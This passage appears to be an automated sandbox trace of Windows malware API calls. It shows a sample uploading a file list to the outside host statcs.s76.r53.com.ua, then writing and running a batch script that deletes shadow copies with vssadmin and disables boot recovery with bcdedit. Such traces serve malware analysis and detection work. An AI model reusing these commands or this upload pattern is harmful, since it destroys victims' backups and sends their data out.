\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0116.486] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0116.486] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0116.486] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0116.486] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0116.486] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="FILESEXTLIST", cchCount1=12, lpString2="FILESEXTLIST", cchCount2=12) returned 2 [0116.486] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\7l6owdi9fmrsoy1o.elst")) returned 0x2020 [0116.486] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\7l6owdi9fmrsoy1o.elst"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0116.487] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="--2FA581AC_Synapse_boundary\r\ncontent-disposition: form-data; name=\"uploadfile\"; filename=\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\"\r\nContent-Type: Application/octet-string\r\n\r\n", cchWideChar=202, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 202 [0116.487] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="--2FA581AC_Synapse_boundary\r\ncontent-disposition: form-data; name=\"uploadfile\"; filename=\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\"\r\nContent-Type: Application/octet-string\r\n\r\n", cchWideChar=202, lpMultiByteStr=0x1372ebc, cbMultiByte=202, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="--2FA581AC_Synapse_boundary\r\ncontent-disposition: form-data; name=\"uploadfile\"; filename=\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\"\r\nContent-Type: Application/octet-string\r\n\r\n", lpUsedDefaultChar=0x0) returned 202 [0116.487] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x12fb68*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12fb68*=0) returned 0x0 [0116.487] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x12fb64*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12fb64*=0) returned 0x0 [0116.487] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x12fb64*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12fb64*=0) returned 0x1e1 [0116.487] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x12fb64*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12fb64*=0) returned 0x0 [0116.487] ReadFile (in: hFile=0xb8, lpBuffer=0x133d088, nNumberOfBytesToRead=0x1e1, lpNumberOfBytesRead=0x12fb44, lpOverlapped=0x0 | out: lpBuffer=0x133d088*, lpNumberOfBytesRead=0x12fb44*=0x1e1, lpOverlapped=0x0) returned 1 [0116.488] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="\r\n--2FA581AC_Synapse_boundary--\r\n", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0116.488] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="\r\n--2FA581AC_Synapse_boundary--\r\n", cchWideChar=33, lpMultiByteStr=0x14150b4, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n--2FA581AC_Synapse_boundary--\r\n", lpUsedDefaultChar=0x0) returned 33 [0116.488] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0116.488] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13f8514, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0116.488] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x143204c, cbMultiByte=27, lpWideCharStr=0x12ea34, cchWideChar=2047 | out: lpWideCharStr="Host: statcs.s76.r53.com.ua") returned 27 [0116.488] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0116.488] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x13ea6fc, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0116.488] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0116.488] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13f853c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0116.488] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x12f888*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x12f8a8 | out: ppResult=0x12f8a8*=0x0) returned 11001 [0116.606] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x12f888*(ai_flags=0, ai_family=23, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x12f8a8 | out: ppResult=0x12f8a8*=0x0) returned 11001 [0116.732] getnameinfo (in: pSockaddr=0x12f910, SockaddrLength=0x0, pNodeBuffer=0x13462ec, NodeBufferSize=0x401, pServiceBuffer=0x141515c, ServiceBufferSize=0x20, Flags=10 | out: pNodeBuffer="-", pServiceBuffer="") returned 10047 [0116.732] htons (hostshort=0x0) returned 0x0 [0116.732] GetCurrentThreadId () returned 0xdf8 [0116.732] GetCurrentThreadId () returned 0xdf8 [0116.732] GetCurrentThreadId () returned 0xdf8 [0116.732] GetCurrentThreadId () returned 0xdf8 [0116.732] GetCurrentThreadId () returned 0xdf8 [0116.732] GetCurrentThreadId () returned 0xdf8 [0116.732] CloseHandle (hObject=0xb8) returned 1 [0116.732] GetCurrentThreadId () returned 0xdf8 [0116.732] GetCurrentThreadId () returned 0xdf8 [0116.732] GetCurrentThreadId () returned 0xdf8 [0116.732] DeleteFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\7l6owdi9fmrsoy1o.elst")) returned 1 [0116.733] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4071a4, lpParameter=0x13f0df0, dwCreationFlags=0x4, lpThreadId=0x140dd84 | out: lpThreadId=0x140dd84*=0xe6c) returned 0xb8 [0116.734] SetThreadPriority (hThread=0xb8, nPriority=0) returned 1 [0116.734] ResumeThread (hThread=0xb8) returned 0x1 [0116.734] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xea60) returned 0x0 [0116.943] FindResourceW (hModule=0x400000, lpName="SHC", lpType=0xa) returned 0x51c4e8 [0116.943] LoadResource (hModule=0x400000, hResInfo=0x51c4e8) returned 0x5185b0 [0116.943] SizeofResource (hModule=0x400000, hResInfo=0x51c4e8) returned 0x222 [0116.943] LockResource (hResData=0x5185b0) returned 0x5185b0 [0116.943] FreeResource (hResData=0x5185b0) returned 0 [0116.943] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0116.943] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0116.944] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0116.944] LockResource (hResData=0x50d64c) returned 0x50d64c [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415120, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415120, cbMultiByte=38, lpWideCharStr=0x140df6c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0116.944] FreeResource (hResData=0x50d64c) returned 0 [0116.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0116.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1415124, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0116.944] GetCurrentThreadId () returned 0xdf8 [0116.944] GetCurrentThreadId () returned 0xdf8 [0116.944] GetCurrentThreadId () returned 0xdf8 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x133d088, cbMultiByte=546, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 546 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x133d088, cbMultiByte=546, lpWideCharStr=0x13463ec, cchWideChar=546 | out: lpWideCharStr="[RNDSTR].cmd\r\necho [RDM_STR]\r\nping -n 30 localhost\r\nwmic.exe process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\necho [RDM_STR]\r\nping -n 10 localhost\r\ncmd.exe /C vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nping -n 10 localhost\r\necho [RDM_STR]\r\nvssadmin.exe delete shadows /all /quiet\r\necho [RDM_STR]\r\n\r\n") returned 546 [0116.944] GetTickCount () returned 0x27bd3 [0116.944] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbbc | out: lpPerformanceCount=0x12fbbc*=17373318369) returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="K") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="G") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="i") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="X") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="H") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="9") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="V") returned 1 [0116.944] CharUpperBuffW (in: lpsz="[RNDSTR].cmd", cchLength=0xc | out: lpsz="[RNDSTR].CMD") returned 0xc [0116.944] CharUpperBuffW (in: lpsz="[RNDSTR]", cchLength=0x8 | out: lpsz="[RNDSTR]") returned 0x8 [0116.944] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=17373345250) returned 1 [0116.944] GetTickCount () returned 0x27bd3 [0116.944] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbbc | out: lpPerformanceCount=0x12fbbc*=17373350737) returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="i") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="O") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="H") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="h") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="X") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="J") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="T") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0116.945] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="F") returned 1 [0116.945] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="V") returned 1 [0116.945] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="t") returned 1 [0116.945] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="K") returned 1 [0116.945] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="Q") returned 1 [0116.945] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="z") returned 1 [0116.945] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="1") returned 1 [0116.945] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="Z") returned 1 [0116.945] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="u") returned 1 [0116.945] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="v") returned 1 [0116.945] CharUpperBuffW (in: lpsz="echo [RDM_STR]\r\nping -n 30 localhost\r\nwmic.exe process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\necho [RDM_STR]\r\nping -n 10 localhost\r\ncmd.exe /C vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nping -n 10 localhost\r\necho [RDM_STR]\r\nvssadmin.exe delete shadows /all /quiet\r\necho [RDM_STR]\r\n\r\n", cchLength=0x214 | out: lpsz="ECHO [RDM_STR]\r\nPING -N 30 LOCALHOST\r\nWMIC.EXE PROCESS CALL CREATE \"CMD.EXE /C VSSADMIN.EXE DELETE SHADOWS /ALL /QUIET & BCDEDIT.EXE /SET {DEFAULT} RECOVERYENABLED NO & BCDEDIT.EXE /SET {DEFAULT} BOOTSTATUSPOLICY IGNOREALLFAILURES\"\r\nECHO [RDM_STR]\r\nPING -N 10 LOCALHOST\r\nCMD.EXE /C VSSADMIN.EXE DELETE SHADOWS /ALL /QUIET & BCDEDIT.EXE /SET {DEFAULT} RECOVERYENABLED NO & BCDEDIT.EXE /SET {DEFAULT} BOOTSTATUSPOLICY IGNOREALLFAILURES\r\nPING -N 10 LOCALHOST\r\nECHO [RDM_STR]\r\nVSSADMIN.EXE DELETE SHADOWS /ALL /QUIET\r\nECHO [RDM_STR]\r\n\r\n") returned 0x214 [0116.945] CharUpperBuffW (in: lpsz="[RDM_STR]", cchLength=0x9 | out: lpsz="[RDM_STR]") returned 0x9 [0116.945] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\kgixh98v.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0116.945] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="echo CiOHhXJTCFVtKQz1Zuv\r\nping -n 30 localhost\r\nwmic.exe process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\necho CiOHhXJTCFVtKQz1Zuv\r\nping -n 10 localhost\r\ncmd.exe /C vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nping -n 10 localhost\r\necho CiOHhXJTCFVtKQz1Zuv\r\nvssadmin.exe delete shadows /all /quiet\r\necho CiOHhXJTCFVtKQz1Zuv\r\n\r\n", cchWideChar=572, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 572 [0116.945] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="echo CiOHhXJTCFVtKQz1Zuv\r\nping -n 30 localhost\r\nwmic.exe process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\necho CiOHhXJTCFVtKQz1Zuv\r\nping -n 10 localhost\r\ncmd.exe /C vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nping -n 10 localhost\r\necho CiOHhXJTCFVtKQz1Zuv\r\nvssadmin.exe delete shadows /all /quiet\r\necho CiOHhXJTCFVtKQz1Zuv\r\n\r\n", cchWideChar=572, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 572 [0116.945] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="echo CiOHhXJTCFVtKQz1Zuv\r\nping -n 30 localhost\r\nwmic.exe process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\necho CiOHhXJTCFVtKQz1Zuv\r\nping -n 10 localhost\r\ncmd.exe /C vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nping -n 10 localhost\r\necho CiOHhXJTCFVtKQz1Zuv\r\nvssadmin.exe delete shadows /all /quiet\r\necho CiOHhXJTCFVtKQz1Zuv\r\n\r\n", cchWideChar=572, lpMultiByteStr=0x13c7fc8, cbMultiByte=572, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="echo CiOHhXJTCFVtKQz1Zuv\r\nping -n 30 localhost\r\nwmic.exe process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\necho CiOHhXJTCFVtKQz1Zuv\r\nping -n 10 localhost\r\ncmd.exe /C vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nping -n 10 localhost\r\necho CiOHhXJTCFVtKQz1Zuv\r\nvssadmin.exe delete shadows /all /quiet\r\necho CiOHhXJTCFVtKQz1Zuv\r\n\r\n\n", lpUsedDefaultChar=0x0) returned 572 [0116.945] WriteFile (in: hFile=0x118, lpBuffer=0x13c7fc8*, nNumberOfBytesToWrite=0x23c, lpNumberOfBytesWritten=0x12fb64, lpOverlapped=0x0 | out: lpBuffer=0x13c7fc8*, lpNumberOfBytesWritten=0x12fb64*=0x23c, lpOverlapped=0x0) returned 1 [0116.946] CloseHandle (hObject=0x118) returned 1 [0116.947] GetCurrentThreadId () returned 0xdf8 [0116.947] GetCurrentThreadId () returned 0xdf8 [0116.947] GetCurrentThreadId () returned 0xdf8 [0116.947] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fc14*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fc04 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd\"", lpProcessInformation=0x12fc04*(hProcess=0x11c, hThread=0x118, dwProcessId=0xe7c, dwThreadId=0xe80)) returned 1 [0116.954] CloseHandle (hObject=0x11c) returned 1 [0116.954] CloseHandle (hObject=0x118) returned 1 [0116.954] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4071a4, lpParameter=0x13f0df0, dwCreationFlags=0x4, lpThreadId=0x140dd84 | out: lpThreadId=0x140dd84*=0xe84) returned 0x118 [0116.954] SetThreadPriority (hThread=0x118, nPriority=0) returned 1 [0116.954] ResumeThread (hThread=0x118) returned 0x1 [0116.954] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0xea60) returned 0x0 [0117.174] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa44, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe")) returned 0x30 [0117.175] FindResourceW (hModule=0x400000, lpName="STCLR", lpType=0xa) returned 0x51c510 [0117.175] LoadResource (hModule=0x400000, hResInfo=0x51c510) returned 0x5187d4 [0117.175] SizeofResource (hModule=0x400000, hResInfo=0x51c510) returned 0x53 [0117.175] LockResource (hResData=0x5187d4) returned 0x5187d4 [0117.175] FreeResource (hResData=0x5187d4) returned 0 [0117.175] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0117.175] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0117.175] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0117.175] LockResource (hResData=0x50d64c) returned 0x50d64c [0117.175] MultiByteToWideChar (in: CodePage=0x4e4, 